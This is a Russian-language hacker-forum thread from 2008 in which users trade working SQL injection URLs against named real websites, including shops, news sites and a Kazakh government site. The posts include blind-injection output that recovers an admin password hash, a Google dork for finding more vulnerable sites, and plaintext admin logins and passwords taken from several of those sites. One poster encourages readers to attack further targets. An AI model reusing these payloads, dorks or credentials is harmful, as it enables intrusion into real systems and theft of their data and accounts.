Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
01.04.2008, 01:09
|
|
Участник форума
Регистрация: 22.10.2007
Сообщений: 138
Провел на форуме:
2454040
Репутация:
177
|
|
типичны пример взлома dle движка через модуль Files
mobila.or.kz
натравляем сплоит
Код:
Идет подбор символов...
Меньше 78
Больше 55
Меньше 67
Меньше 62
Меньше 59
Меньше 58
Меньше 57
Символ найден: 9
Больше 78
Больше 101
Меньше 113
Меньше 108
Меньше 105
Меньше 104
Меньше 103
Символ найден: f
Меньше 78
Меньше 55
Больше 44
Больше 50
Меньше 53
Меньше 52
Символ найден: 4
Меньше 78
Меньше 55
Больше 44
Больше 50
Меньше 53
Больше 52
Символ найден: 5
Больше 78
Меньше 101
Больше 90
Больше 96
Меньше 99
Больше 98
Символ найден: c
Меньше 78
Меньше 55
Больше 44
Меньше 50
Больше 48
Символ найден: 1
Больше 78
Меньше 101
Больше 90
Больше 96
Меньше 99
Меньше 98
Символ найден: b
Меньше 78
Больше 55
Меньше 67
Меньше 62
Меньше 59
Меньше 58
Меньше 57
Символ найден: 8
Меньше 78
Меньше 55
Больше 44
Больше 50
Меньше 53
Меньше 52
Символ найден: 4
Меньше 78
Меньше 55
Больше 44
Больше 50
Больше 53
Символ найден: 7
Меньше 78
Больше 55
Меньше 67
Меньше 62
Меньше 59
Меньше 58
Меньше 57
Символ найден: 8
Больше 78
Меньше 101
Больше 90
Больше 96
Меньше 99
Больше 98
Символ найден: c
Меньше 78
Меньше 55
Больше 44
Больше 50
Больше 53
Символ найден: 6
Меньше 78
Меньше 55
Больше 44
Больше 50
Больше 53
Символ найден: 6
Меньше 78
Больше 55
Меньше 67
Меньше 62
Меньше 59
Меньше 58
Меньше 57
Символ найден: 9
Меньше 78
Больше 55
Меньше 67
Меньше 62
Меньше 59
Меньше 58
Меньше 57
Символ найден: 9
Меньше 78
Меньше 55
Больше 44
Меньше 50
Меньше 48
Больше 47
Символ найден: 0
Меньше 78
Меньше 55
Больше 44
Больше 50
Больше 53
Символ найден: 7
Меньше 78
Меньше 55
Больше 44
Больше 50
Больше 53
Символ найден: 6
Меньше 78
Меньше 55
Больше 44
Меньше 50
Больше 48
Символ найден: 2
Меньше 78
Меньше 55
Больше 44
Больше 50
Меньше 53
Меньше 52
Символ найден: 3
Меньше 78
Больше 55
Меньше 67
Меньше 62
Меньше 59
Меньше 58
Меньше 57
Символ найден: 8
Меньше 78
Больше 55
Меньше 67
Меньше 62
Меньше 59
Меньше 58
Меньше 57
Символ найден: 8
Меньше 78
Меньше 55
Больше 44
Больше 50
Меньше 53
Меньше 52
Символ найден: 4
Меньше 78
Больше 55
Меньше 67
Меньше 62
Меньше 59
Меньше 58
Меньше 57
Символ найден: 8
Больше 78
Меньше 101
Больше 90
Больше 96
Больше 99
Символ найден: e
Меньше 78
Больше 55
Меньше 67
Меньше 62
Меньше 59
Меньше 58
Меньше 57
Символ найден: 9
Меньше 78
Меньше 55
Больше 44
Меньше 50
Меньше 48
Больше 47
Символ найден: 0
Больше 78
Меньше 101
Больше 90
Больше 96
Больше 99
Символ найден: d
Больше 78
Меньше 101
Больше 90
Больше 96
Меньше 99
Больше 98
Символ найден: c
Больше 78
Больше 101
Меньше 113
Меньше 108
Меньше 105
Меньше 104
Меньше 103
Символ найден: f
Больше 78
Больше 101
Меньше 113
Меньше 108
Меньше 105
Меньше 104
Меньше 103
Символ найден: f
9f45c1b8478c6699076238848e90dcff
md5(md5('pass')) = 9f45c1b8478c6699076238848e90dcff = 023154
ник админа devil
http://mobila.or.kz/admin.php
идем админить
правда в этом случае шел не удалось залить, но бажных сайтов много
дерзайте)) |
|
|
01.04.2008, 22:08
|
|
Участник форума
Регистрация: 28.12.2006
Сообщений: 111
Провел на форуме:
500695
Репутация:
524
|
|
upi.ru - Урал-пресс-информ
В антибояне вроде нет, но кажись где-то всё же этот узел светился...
Код:
http://www.upi.ru/show_image_photoset.php?id=-1+union+select+1,2,3,concat_ws(0x3a,version(),database(),user()),5,6,7/*
5.0.32-log:articles:upi@localhost
55 таблиц, остальное через мобилу искать внапряг...
|
|
|
|
02.04.2008, 00:09
|
|
Постоянный
Регистрация: 30.08.2005
Сообщений: 730
Провел на форуме:
6828219
Репутация:
2274
|
|
К моему верхнему посту
_http://intimshop.ru/kernel.php?section=items%2Fpresentations&action=sh ow&item_id=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,3 2,33,34,35,36,37,38,39/*
Тотже двиг, тоже секс шоп таже 5 версия  |
|
|
|
02.04.2008, 01:18
|
|
Участник форума
Регистрация: 06.03.2008
Сообщений: 105
Провел на форуме:
253346
Репутация:
146
|
|
туда же, ошибка таже )))
http://www.vibrator.ru
http://eurointim.ru
http://sexshop.mars.fov.ru |
|
|
|
02.04.2008, 11:57
|
|
Участник форума
Регистрация: 25.05.2007
Сообщений: 147
Провел на форуме:
2313429
Репутация:
728
|
|
Продукт: -----------
Разработчик: www.webroad.ru
Баг: Sql Injection
Google: site:ru inurl:news.php?id1=
Example:
Код:
http://dipl.spb.ru/news.php?id1=-288+union+select+1,2,3,concat(login,0x3a,password),5,6,7,8,9,10,11,12,13,14+from+ssrusers/*
Result: admin:Lampo4ka
Админка: http://dipl.spb.ru/admin
Comments: Что-то вроде CMS, названия нет, и сайтов под ней штук 20. Баг работает не везде, т.к. при эксплуатации скуль, при слове from в запросе, иногда перебрасывает на http://2.sweb.ru/insecure, а иногда количество полей неверное, придется подбирать самим
Последний раз редактировалось 0nep@t0p; 02.04.2008 в 20:32..
|
|
|
|
02.04.2008, 19:43
|
|
Участник форума
Регистрация: 06.11.2007
Сообщений: 143
Провел на форуме:
350782
Репутация:
81
|
|
http://www.enbek.kz/migration/migr_rus.php?mintrud=-1+union+select+1,2,concat(version(),char(13),user( ),char(13),database()),4,5,6,7/*
4.1.7-standard-log
root@localhost
enbek
login:root
pass:Piz01EN
|
|
|
|
02.04.2008, 21:03
|
|
Участник форума
Регистрация: 06.11.2007
Сообщений: 143
Провел на форуме:
350782
Репутация:
81
|
|
http://www.akciyaleitz.eu/products.php?action=products_list&group=-1+union+select+1,version(),3,4/*
5.0.32-Debian_7etch1-log
http://www.akciyaleitz.eu/admin/index.php
login:akciya
pass:aklz07
login:akstat
pass:akst81
login:akwin
pass:akwn38
|
|
|
|
02.04.2008, 21:43
|
|
Участник форума
Регистрация: 17.01.2008
Сообщений: 170
Провел на форуме:
1608606
Репутация:
105
|
|
если баян не ругаться
_http://www.number.ru/links/index.php?cat=-1+union+select+concat_ws(Char(58),user(),database( ),VERSION()),2,3,4,5,6,7/*
root@localhost:number:4.0.26-log (результат почти в самом низу)
http://www.l-gifts.ru/brandopis.php?brand=-1+union+select+1,null,3,null,5,6,concat_ws(CHAR(58 ),DATABASE(),USER(),VERSION()),8,9,10/*
vittorio:vittorio@pm18.zenon.net:4.0.27-log
Последний раз редактировалось Fuckel; 02.04.2008 в 23:52..
|
|
|
|
03.04.2008, 11:51
|
|
Banned
Регистрация: 19.10.2007
Сообщений: 152
Провел на форуме:
557623
Репутация:
415
|
|
www.myadultplanet.com
http://www.myadultplanet.com/view_message.php?folder=&mess_id=3687'
http://www.myadultplanet.com/view_message.php?folder=&mess_id=3687+AND+108%3Cas cii(lower(substring(user(),1,1)))
http://www.myadultplanet.com/view_message.php?folder=&mess_id=3687+AND+120%3Cas cii(lower(substring(user(),2,1)))
http://www.myadultplanet.com/view_message.php?folder=&mess_id=3687+AND+96%3Casc ii(lower(substring(user(),3,1)))
и т.д.
имя юзера: myadultp_main@localhost
название БД: myadultp_main
версия мускула: 4.1.22
угаданные имена таблиц: blogs, messages, groups, events, help, photos, journal, invites, bookmarks
phpinfo:
http://www.myadultplanet.com/phpinfo.php
P.S. Для реализации баги - нужно зарегиться на сайте.
Последний раз редактировалось otmorozok428; 03.04.2008 в 11:53..
|
|
|
|
03.04.2008, 21:52
|
|
Участник форума
Регистрация: 06.11.2007
Сообщений: 143
Провел на форуме:
350782
Репутация:
81
|
|
http://www.ayda.ru/stories/show_u.php?u=-1+union+select+1,2,3,4,5,6,7,concat(login,char(58) ,password),9,10,11,12,13,14,15+from+users/*
login:maxversus
pass:Km12hox15
При дальнейшем исследовании оказалось что логин всего один так что скорее всего это админ.
Последний раз редактировалось truelamer; 04.04.2008 в 06:24..
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
